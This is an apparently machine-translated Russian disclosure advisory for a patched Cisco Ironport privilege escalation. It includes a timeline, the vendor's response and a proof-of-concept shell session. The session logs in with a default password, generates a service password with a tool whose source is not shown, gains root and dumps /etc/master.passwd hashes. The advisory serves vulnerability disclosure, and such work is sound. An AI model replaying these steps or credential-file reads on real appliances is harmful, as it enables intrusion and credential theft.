Обновлено для Linux
Cisco Ironport Appliances Privilege Escalation Поставщик уязвимости: Cisco Product Webage: http://www.cisco.com Потронувшая версии: Cisco Ironport ESA - Asyncos 8.5.5-280 Cisco Ironport WSA - Asyncos 8.0.5-075 Cisco Ironport SMA - Asyncos 8.3.6-0 Дата: 22/05/2014 Кредиты: Glafkos haralambous cve: не назначен Cisco
Сроки раскрытия: 19-05-2014: уведомление поставщика 20-05-2014: Ответ/обратная связь поставщика 27-08-2014: Исправление поставщика/Патч 24-01-2015: Общественное раскрытие информации
Описание: Приборы Cisco Ironport уязвимы для аутентифицированной эскалации привилегий «администратора». Включая учетную запись службы из графического интерфейса или CLI, позволяет администратору получить корневой доступ к устройству, поэтому обход всех существующих ограничений учетной записи «администратора». Уязвимость обусловлена слабой реализацией алгоритма в процессе генерации паролей, который используется Cisco для удаленного доступа к прибору для обеспечения технической поддержки.
Ответ поставщика: как и предполагалось, это считается не уязвимостью, а проблемой упрочнения безопасности. Таким образом, мы не назначали CVE, однако я позаботился о том, чтобы это было зафиксировано на SMA, ESA и WSA. Исправление включало в себя несколько изменений, таких как лучшее защиту алгоритма в двоичном файле, изменение самого алгоритма, чтобы быть более надежным и обеспечивающей сложность пароля, когда администратор устанавливает пас-фразу и включает учетную запись.
[SD] Примечание. Административные учетные данные необходимы для того, чтобы активировать доступ к представителю поддержки и для настройки пас-фразы, которую он используется для вычисления окончательного пароля. [GC] по -прежнему пользователь администратора имеет ограниченные разрешения на прибор, а учетные данные также могут быть скомпрометированы, даже с паролем по умолчанию, что приводит к полному доступу к корнеу.
[SD] Эта проблема отслеживается для ESA с помощью Cisco ID ошибка: CSCUO96011 для SMA от Cisco ID BUG: CSCUO96056 и для WSA от Cisco Bug Id CSCUO90528
Технические данные: Вход в прибор с помощью пароля по умолчанию «Ironport» или пользователя, указанного в пользователе, есть возможность включить удаленный доступ поддержки клиентов. Эту опцию можно найти под помощью и поддержки -> Удаленный доступ на графическом интерфейсе или с помощью учетной записи CLI Console «EnabledIAG» и выдачи командной службы. Включение этой службы требует временного пароля пользователя, который должен быть предоставлен вместе с серийным номером устройства для Cisco TechSupport для удаленного подключения и аутентификации к прибору.
Имея временный пароль и серийный номер устройства, позволяя сервисной учетной записи, злоумышленник, в свою очередь, может получить полный доступ к корням, а также потенциально повредить его, задняя и т. Д. И т. Д.
POC:
root@kali:~# ssh -lenablediag 192.168.0.158
Password:
Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
Available Commands:
help -- View this text.
quit -- Log out.
service -- Enable or disable access to the service system.
network -- Perform emergency configuration of the diagnostic network interface.
clearnet -- Resets configuration of the diagnostic network interface.
ssh -- Configure emergency SSH daemon on the diagnostic network interface.
clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
tunnel -- Start up tech support tunnel to IronPort.
print -- Print status of the diagnostic network interface.
reboot -- Reboot the appliance.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently disabled.
ironport.example.com> service
Service Access is currently disabled. Enabling this system will allow an
IronPort Customer Support representative to remotely access your system
to assist you in solving your technical issues. Are you sure you want
to do this? [Y/N]> Y
Enter a temporary password for customer support to use. This password may
not be the same as your admin password. This password will not be able
to be used to directly access your system.
[]> cisco123
Service access has been ENABLED. Please provide your temporary password
to your IronPort Customer Support representative.
S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
Service Access currently ENABLED (0 current service logins)
ironport.example.com>
gcc -std=99 -o woofwoof woofwoof.c -lcrypto
./woofwoof
Usage: woofwoof.exe -p password -s serial
-p <password> | Cisco Service Temp Password
-s <serial> | Cisco Serial Number
-h | This Help Menu
Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4
./woofwoof -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
F508A4
Service Password: b213c9a4
root@kali:~# ssh -lservice 192.168.0.158
Password:
Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
Copyright (c) 2001-2013, Cisco Systems, Inc.
AsyncOS 8.5.5 for Cisco C100V build 280
Welcome to the Cisco C100V Email Security Virtual Appliance
# uname -a
FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 [email protected]:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64
# cat /etc/master.passwd
# $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
root:*:0:0::0:0:Mr &:/root:/sbin/nologin
service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5::0:0:System &:/:/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin